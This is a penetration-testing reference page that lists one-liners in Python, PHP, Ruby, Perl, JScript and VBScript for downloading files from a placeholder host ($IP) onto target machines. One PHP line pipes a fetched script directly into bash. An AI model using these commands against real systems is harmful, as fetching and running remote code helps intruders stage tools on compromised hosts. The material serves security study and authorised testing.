☠️ ζHUB

Code File Transfer

Created: Mar 01, 2025
Updated: Mar 13, 2025

Target machines often have different programming languages installed. Linux usually includes Python, PHP, Perl, and Ruby, while Windows may have them too, but less often.

On Windows, built-in tools like cscript and mshta can run JavaScript or VBScript code.

Python

Python is a high-level, general-purpose programming language. Its design philosophy emphasizes code readability with the use of significant indentation. 

# Download a file (Python2)
python2.7 -c 'import urllib;urllib.urlretrieve ("http://$IP/test.txt", "test.txt")'
 
# Download a file (Python3)
python3 -c 'import urllib.request;urllib.request.urlretrieve("http://$IP/test.txt", "test.txt")'

PHP

PHP is a general-purpose scripting language geared towards web development. It was originally created by Danish-Canadian programmer Rasmus Lerdorf in 1993 and released in 1995. 

# Download a file 
php -r '$file = file_get_contents("http://$IP/test.txt"); file_put_contents("test.txt",$file);'
 
# Download a file using fopen() module
php -r 'const BUFFER = 1024; $fremote = fopen("http://$IP/test.txt", "rb"); $flocal = fopen("test.txt", "wb"); while ($buffer = fread($fremote, BUFFER)) { fwrite($flocal, $buffer); } fclose($flocal); fclose($fremote);'
 
# Download a file in memory 
php -r '$lines = @file("http://$IP/test.sh"); foreach ($lines as $line_num => $line) { echo $line; }' | bash

Ruby

Ruby is an interpreted, high-level, general-purpose programming language. It was designed with an emphasis on programming productivity and simplicity

# Download a file 
ruby -e 'require "net/http"; File.write("test.txt", Net::HTTP.get(URI.parse("http://$IP/test.sh")))'

Perl

Perl is a high-level, general-purpose, interpreted, dynamic programming language. Though Perl is not officially an acronym, there are various backronyms in use, including “Practical Extraction and Reporting Language”.

# Download a file 
perl -e 'use LWP::Simple; getstore("http://$IP/test.sh", "test.txt");'

JavaScript

The JavaScript code below lets us download a file. We’ll save it in a file called wget.js with the following content:

wget.js
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
BinStream = new ActiveXObject("ADODB.Stream");
BinStream.Type = 1;
BinStream.Open();
BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile(WScript.Arguments(1));

Run this command in Command Prompt or PowerShell to execute the JavaScript and download a file.

cscript.exe /nologo wget.js http://$IP/test.txt test.txt

VBScript

The VBScript code below lets us download a file. We’ll save it in a file called wget.vbs with the following content:

wget.vbs
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", WScript.Arguments.Item(0), False
xHttp.Send
 
with bStrm
    .type = 1
    .open
    .write xHttp.responseBody
    .savetofile WScript.Arguments.Item(1), 2
end with

Run this command in Command Prompt or PowerShell to execute the VBScript and download a file.

cscript.exe /nologo wget.vbs http://$IP/test.txt test.txt

Backlinks